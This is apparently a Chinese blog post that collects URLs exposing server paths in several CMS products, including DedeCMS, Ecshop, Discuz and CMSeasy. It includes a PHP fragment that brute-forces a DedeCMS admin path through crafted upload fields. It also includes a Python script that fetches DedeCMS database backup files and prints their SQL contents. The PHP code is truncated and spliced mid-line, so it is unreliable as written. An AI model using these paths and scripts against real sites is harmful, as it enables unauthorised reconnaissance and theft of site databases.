收集爆出cms后台路劲的方法

 

 

 

欢迎留言,添加更多!

DeDeCms:

/member/templets/menulit.php
/include/dialog/select_media.php
/plus/paycenter/alipay/return_url.php
/plus/paycenter/cbpayment/autoreceive.php
/paycenter/nps/config_pay_nps.php
/plus/task/dede-maketimehtml.php
/plus/task/dede-optimize-table.php
/plus/task/dede-upcache.php
 true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv
import requests
import sys
import gevent
from gevent import monkey
monkey.patch_all()
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}

url = sys.argv[1]
# url = 'http://demo.dede.com/'

def gev():
    threads = [gevent.spawn(attack, num) for num in range(10)]
    gevent.joinall(threads)

def attack(num):
    try:
        exp = '/data/backupdata/dede_a~{}.txt'.format(num)
        url_exp = url + exp
        res = requests.get(url=url_exp, headers=headers)
        code = res.status_code
        text = res.text
        if code == 200 and 'INSERT INTO' in text:
            print('[{}] -> {}'.format(url_exp, text))
    except Exception as e:
        pass

gev()
# python3 dede.py HTTP://test.com/

WordPress:

/wp-admin/includes/file.php
/wp-content/themes/baiaogu-seo/footer.php

Ecshop商城系统暴路径漏洞文件:

/api/cron.php
/wap/goods.php
/temp/compiled/ur_here.lbi.php
/temp/compiled/pages.lbi.php
/temp/compiled/user_transaction.dwt.php
/temp/compiled/history.lbi.php
/temp/compiled/page_footer.lbi.php
/temp/compiled/goods.dwt.php
/temp/compiled/user_clips.dwt.php
/temp/compiled/goods_article.lbi.php
/temp/compiled/comments_list.lbi.php
/temp/compiled/recommend_promotion.lbi.php
/temp/compiled/search.dwt.php
/temp/compiled/category_tree.lbi.php
/temp/compiled/user_passport.dwt.php
/temp/compiled/promotion_info.lbi.php
/temp/compiled/user_menu.lbi.php
/temp/compiled/message.dwt.php
/temp/compiled/admin/pagefooter.htm.php
/temp/compiled/admin/page.htm.php
/temp/compiled/admin/start.htm.php
/temp/compiled/admin/goods_search.htm.php
/temp/compiled/admin/index.htm.php
/temp/compiled/admin/order_list.htm.php
/temp/compiled/admin/menu.htm.php
/temp/compiled/admin/login.htm.php
/temp/compiled/admin/message.htm.php
/temp/compiled/admin/goods_list.htm.php
/temp/compiled/admin/pageheader.htm.php
/temp/compiled/admin/top.htm.php
/temp/compiled/top10.lbi.php
/temp/compiled/member_info.lbi.php
/temp/compiled/bought_goods.lbi.php
/temp/compiled/goods_related.lbi.php
/temp/compiled/page_header.lbi.php
/temp/compiled/goods_script.html.php
/temp/compiled/index.dwt.php
/temp/compiled/goods_fittings.lbi.php
/temp/compiled/myship.dwt.php
/temp/compiled/brands.lbi.php
/temp/compiled/help.lbi.php
/temp/compiled/goods_gallery.lbi.php
/temp/compiled/comments.lbi.php
/temp/compiled/myship.lbi.php
/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
/includes/modules/cron/auto_manage.php
/includes/modules/cron/ipdel.php

Ucenter爆路径:

/ucenter/control/admin/db.php

DZbbs:

/manyou/admincp.php?my_suffix=%0A%0DTOBY57

Z-blog:

/admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

Php168爆路径:

/admin/inc/hack/count.php?job=list
/admin/inc/hack/search.php?job=getcode
/admin/inc/ajax/bencandy.php?job=do
/cache/MysqlTime.txt
/PHPcms2008-sp4

CMSeasy爆网站路径漏洞:

/lib/mods/celive/menu_top.php
/lib/default/ballot_act.php
/lib/default/special_act.php

 

你可能感兴趣的:(web)